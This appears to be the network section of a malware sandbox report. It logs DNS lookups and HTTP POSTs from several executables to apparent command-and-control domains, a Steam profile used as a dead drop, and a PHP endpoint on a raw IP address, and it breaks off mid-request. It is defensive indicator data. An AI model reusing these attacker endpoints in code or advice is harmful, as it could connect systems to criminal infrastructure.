                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: zinc-sneark.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=srk3islcb5kvdl4sdk17gebtjg; expires=Mon, 31-Mar-2025 20:03:31 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O6g%2FPSIh2%2B%2Fz6w0N6ptA3xxSvCyh5OHBDpCa%2FA2bG3HBLh2VuGHKqYe7Ws%2BX2iil382Q4S26FhUUKkeyRhDV7nPKL0bUZq4lbAqdmsvCAC5q8Jf27MzxNw%2F1WXuXviRilA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6c00ed2bd7e-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=49729&min_rtt=46930&rtt_var=14383&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=75632&cwnd=253&unsent_bytes=0&cid=2ff4518f43808684&ts=1087&x=0"
                                • flag-us
                                  DNS
                                  dare-curbys.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  dare-curbys.biz
                                  IN A
                                  Response
                                  dare-curbys.biz
                                  IN A
                                  104.21.43.156
                                  dare-curbys.biz
                                  IN A
                                  172.67.181.44
                                • flag-us
                                  POST
                                  https://dare-curbys.biz/api
                                  2M4078.exe
                                  Remote address:
                                  104.21.43.156:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dare-curbys.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=9pmmod91l35ghlqg4g8u1mmnmu; expires=Mon, 31-Mar-2025 20:03:32 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fB%2B3vv%2BZklNL7Qvh8zq%2BgkEmAf%2BRUfnUweDL%2B7weg%2F1NeEsiP4ycusr4NiiJKjm3M6wdOnfkgUb%2BZLBoh58fqJgtZodXqO%2FPM6w4xY0LpPAx2kttyXtVPEaoPLbVN2Z3Mp8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6c31d2d953b-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=48006&min_rtt=46940&rtt_var=11491&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=603&delivery_rate=77931&cwnd=253&unsent_bytes=0&cid=b3288f99122baf2e&ts=894&x=0"
                                • flag-us
                                  DNS
                                  64.206.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  64.206.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  156.43.21.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  156.43.21.104.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://dwell-exclaim.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.153.96:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dwell-exclaim.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=pc6rsuh4j3arn6m8igrop1h6or; expires=Mon, 31-Mar-2025 20:03:32 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4osCi0MPw3ZAwyjOzZvKzzHKv7OmpU%2FHguCj8YOqcs1pz1dCkY3RD8seBPqCJNmBvbaXhnjnGlgjhl6GtO6P%2BMZvQBCfoSwoM3uKs85G1s5Wl7hK8lUd0xbyJrVgholBhi2wA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6c79cb78889-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47374&min_rtt=46958&rtt_var=10547&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3303&recv_bytes=607&delivery_rate=83870&cwnd=253&unsent_bytes=0&cid=07fc962e5cf00183&ts=599&x=0"
                                • flag-us
                                  DNS
                                  print-vexer.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  print-vexer.biz
                                  IN A
                                  Response
                                  print-vexer.biz
                                  IN A
                                  104.21.35.246
                                  print-vexer.biz
                                  IN A
                                  172.67.181.192
                                • flag-us
                                  POST
                                  https://print-vexer.biz/api
                                  2M4078.exe
                                  Remote address:
                                  104.21.35.246:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: print-vexer.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=2skb3m9845b04niu939f3fju1k; expires=Mon, 31-Mar-2025 20:03:33 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kwzq4JCV2eQh6Qx7cOoYXhKbRVzxsgKFPnDVfdsvE7omfl0xJ9nNId4IJOzybukU8q56NN3HBA9IYZadXDuVRyT2lN0iTzvJQNPfHEqbigf4Su81m1sdTDmzRV30xoHxBYA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6ca2d20417d-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=58563&min_rtt=51482&rtt_var=23087&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=61703&cwnd=253&unsent_bytes=0&cid=a86ce4732f9231dc&ts=657&x=0"
                                • flag-us
                                  POST
                                  https://formy-spill.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.173.74:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: formy-spill.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=6gv6haa99ojcga74g561pqg5ap; expires=Mon, 31-Mar-2025 20:03:33 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJEoMFib%2BPnX8l4GijQdIAVDw4VtNX40enwYMYU7iZm2rncZLqKGmAYOU23KiLgIKKm7kNtkS950C3Qbqprex01FHpZaLQKyZDT2UMw4XrQ2nctyNJ6sLVOIG3VH8Umbtho%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6cc1bd89413-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=56158&min_rtt=50246&rtt_var=15574&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=80860&cwnd=253&unsent_bytes=0&cid=e4682622ecaaa826&ts=693&x=0"
                                • flag-us
                                  DNS
                                  246.35.21.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  246.35.21.104.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  impend-differ.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  impend-differ.biz
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  steamcommunity.com
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  steamcommunity.com
                                  IN A
                                  Response
                                  steamcommunity.com
                                  IN A
                                  23.214.143.155
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  2M4078.exe
                                  Remote address:
                                  23.214.143.155:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Length: 35602
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=12c6100f582b03671b40059f; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-us
                                  POST
                                  https://covery-mover.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.206.64:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: covery-mover.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=e1tmrp88kc181c1on5k4nn2n88; expires=Mon, 31-Mar-2025 20:03:34 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47nJqZnPbJD6P1%2FjV%2Bwyr7MQeM75j2nEohf5PEeFJmZOD%2Bqq%2BGtKhNVb00KIVO6FoL69hoYisNM1mynl%2F6NHVCiS0VYi00udyuxxEyxAio4J2S1CEqepJ0IZv7K7CvLLdmwv"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6d1192b93f3-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47869&min_rtt=47023&rtt_var=11254&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=82696&cwnd=253&unsent_bytes=0&cid=ff5ccf62299d4079&ts=1356&x=0"
                                • flag-us
                                  DNS
                                  marshal-zhukov.com
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  marshal-zhukov.com
                                  IN A
                                  Response
                                  marshal-zhukov.com
                                  IN A
                                  172.67.160.80
                                  marshal-zhukov.com
                                  IN A
                                  104.21.82.174
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 403 Forbidden
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JX1jjqG2cr4FKh0SUCfyy1bU4NVmplK%2FCkFxbDA7K3j9oziyMFaVu3vOQb882FvgIthwTg%2FWsxla8E9mY%2FYo8jSaQBMHlJz0yKoPZoWL1aqc8pwi10db%2F6rpSdl6z4TpqlsnHo0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6d3ccd894c1-LHR
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=GUWXk5E5QOmHQuPkHrtObFA.HbvTp2jwlATnRULWzVg-1733451415-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 53
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=kioi8aoqnsjul4ajgqgao71agj; expires=Mon, 31-Mar-2025 20:03:35 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9um7amWnDax1qfGbke8N4jG7mjIF2VEcSdAz5SP0cxAfwQObUukiwqUycsHK0BTZezSsbzzJLHvUksHUOybxesaT2aO2PxL4czgP4r2Awdlf12VXYXMB%2FCsHmkQVYL4cjKhkMA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6d8787f94c1-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=61648&min_rtt=49159&rtt_var=10943&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8578&recv_bytes=1075&delivery_rate=126619&cwnd=257&unsent_bytes=0&cid=3993e6105c5b5f26&ts=1709&x=0"
                                • flag-us
                                  DNS
                                  155.143.214.23.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  155.143.214.23.in-addr.arpa
                                  IN PTR
                                  Response
                                  155.143.214.23.in-addr.arpa
                                  IN PTR
                                  a23-214-143-155deploystaticakamaitechnologiescom
                                • flag-us
                                  DNS
                                  80.160.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  80.160.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://dare-curbys.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  104.21.43.156:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dare-curbys.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=s0gghr7i4bitgjpujvg8hmbo0g; expires=Mon, 31-Mar-2025 20:03:35 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFlUESRevaFl85vnUeYbIVJDT%2FmfIbvlGOr0jlSqj0B7B9XhFTR8IH17BN2bsjwkM5KWE1W%2Bq%2F9QJjESzvQzsuOosdS9%2F4b18n7wJavieMOixmAHe9Unc3281%2BzYAM%2F7VSg%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6da4b5994a1-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47953&min_rtt=47121&rtt_var=11511&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=84474&cwnd=253&unsent_bytes=0&cid=46ff26f58b1c9b5e&ts=640&x=0"
                                • flag-us
                                  DNS
                                  228.249.119.40.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  228.249.119.40.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://print-vexer.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  104.21.35.246:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: print-vexer.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=tif5gjo8tc4vh76ur7l23d1qtq; expires=Mon, 31-Mar-2025 20:03:36 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=563R3RMzHTwuFve1jf6lne0m7zRrpqI9dZKRfC%2BIDFBmvBjFbG%2B5LuIPK%2FCxcHpdDSvH%2Bqql4vr%2BwigcahpAogZILVwMhJz%2FgXjfct1NT4pBlyECYPjsrY2afwOQrCSY8E0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6dede46cd4b-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47899&min_rtt=47278&rtt_var=11053&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=603&delivery_rate=81601&cwnd=253&unsent_bytes=0&cid=1badd49216f6e82d&ts=389&x=0"
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  BhD8htX.exe
                                  Remote address:
                                  23.214.143.155:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Fri, 06 Dec 2024 02:16:58 GMT
                                  Content-Length: 35602
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=e881c9735643b8cd409f922b; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 403 Forbidden
                                  Date: Fri, 06 Dec 2024 02:16:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tb%2FinMDPU2QrBuS3wVEJKSWuop5VkheAM2VYExMMuxN6BO4FPAPqGKuk5QTzS%2BVaa2o2YbYJ9Z8DXykiAruNmfjiH%2BA8Nm2Gr8tLoHokPXJiUnaHvbG4JF0cqMQ4sj97kScU5A0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6e58a3394d2-LHR
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=IpTVhzhKheYz9NDiNAVYbnbRkaz7D_mT6hW29Wnov8g-1733451418-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 49
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=qp2un8m74go375p7b53pg7bpb7; expires=Mon, 31-Mar-2025 20:03:37 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ft45%2B%2B9ugZvTXFr69uia7ID3PaXygZdAhlqitssK9Ipv%2FIRcRB6viWSOE79yYw1kWqAn2BOWwAHKwVgF14uS48dNzR2bhCu%2By18unSYvjbJO5DQQoO5I0iQM6oBwCnCbK%2BApYkY%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6e69adc94d2-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=51963&min_rtt=48483&rtt_var=6551&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8575&recv_bytes=1071&delivery_rate=150446&cwnd=257&unsent_bytes=0&cid=46921dd0b2d0feab&ts=491&x=0"
                                • flag-ru
                                  GET
                                  http://185.215.113.206/
                                  3Z39A.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:59 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-ru
                                  POST
                                  http://185.215.113.206/c4becf79229cb002.php
                                  3Z39A.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  POST /c4becf79229cb002.php HTTP/1.1
